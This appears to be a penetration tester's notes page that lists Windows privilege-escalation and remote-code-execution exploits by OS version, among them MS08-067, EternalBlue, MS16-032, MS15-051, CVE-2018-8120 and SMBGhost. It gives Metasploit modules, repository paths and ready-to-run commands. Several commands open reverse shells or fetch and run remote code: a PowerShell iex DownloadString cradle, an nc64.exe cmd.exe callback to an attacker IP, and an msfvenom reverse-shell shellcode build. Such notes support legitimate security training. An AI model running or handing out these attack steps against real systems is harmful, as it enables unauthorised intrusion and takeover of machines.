windows exploits

MS08-067 Exploit

https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py
https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067_w2k3_sp2.py

MS-17-010 EternalBlue Exploit

msf:
- checker: use auxiliary/scanner/smb/smb_ms17_010
- exploit: use exploit/windows/sbm/ms17_010_eternalblue
eternalblue_manual_exploit
- no pipes needed | manual method
helviojunior/MS17-010.git
- update username as guest / anonymous (if needed)
- python send_and_execute.py TARGET_IP SHELL.exe
3ndG4me/AutoBlue-MS17-010
- ensure to run pre requisites
- python zzz_exploit.py TARGET_IP
exploit-db/42315

MS-16-032 Exploit

EmpireProject/Invoke-MS16032.ps1
- Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('shell.ps1')"

Windows 7

MS11-046 | CVE-2011-1249 | win7 6.1.7600 N/A Build 7600 x86
- abatchy17/MS11-046
MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
- egre55/MS10-059:%20Chimichurri/Compiled
- MS10-059.exe KALI_IP PORT

MS09-050 'srv2.sys' SMB Code Execution (Python)

exploit-db/40280

MS09-002 Memory Corruption IE7 Exploit

msf: use windows/browser/ms09_002_memory_corruption

Windows Server 2008 R2 SP1

CVE-2018-8120
Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode
SecWiki/CVE-2018-8120

Windows 7 SP1

CVE-2018-8120
- Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode
- SecWiki/CVE-2018-8120

Windows Server 2008 SP1

CVE-2018-8120
- Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode
- SecWiki/CVE-2018-8120
MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
- egre55/MS10-059:%20Chimichurri/Compiled
- MS10-059.exe KALI_IP PORT

Windows Server 2003

MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
- egre55/MS10-059:%20Chimichurri/Compiled
- MS10-059.exe KALI_IP PORT

Windows Server 2012 R2 Standard

MS16-098 | CVE-2016-3309 | Server 2012 R2 Standard 6.3.9600 N/A Build 9600
- SecWiki/MS16-098

Windows Server 2008 R2

MS15-05
- SecWiki/MS15-051/MS15-051-KB3045171.zip
- ms15-051.exe "nc64.exe -c cmd.exe IP PORT"
MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
- egre55/MS10-059:%20Chimichurri/Compiled
- MS10-059.exe KALI_IP PORT

Windows XP SP1

Local PE using Windows Services (upnphost and SSDPSRV)
- https://sohvaxus.github.io/content/winxp-sp1-privesc.html

CVE-2020-0796 | smbhghost

REQUIREMENTS:

needs smb port:445 open

Steps:

danigargu/CVE-2020-0796
Generate shellcode using msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f dll -f csharp
Update shellcode on line 204 file: exploit.cpp
Set TARGET_ARCH and set for RELEASE
Build solution
Run cve-2020-0796-local.exe

Previouswindows UsoSvc service Nextwindows iot core

Last updated 4 years ago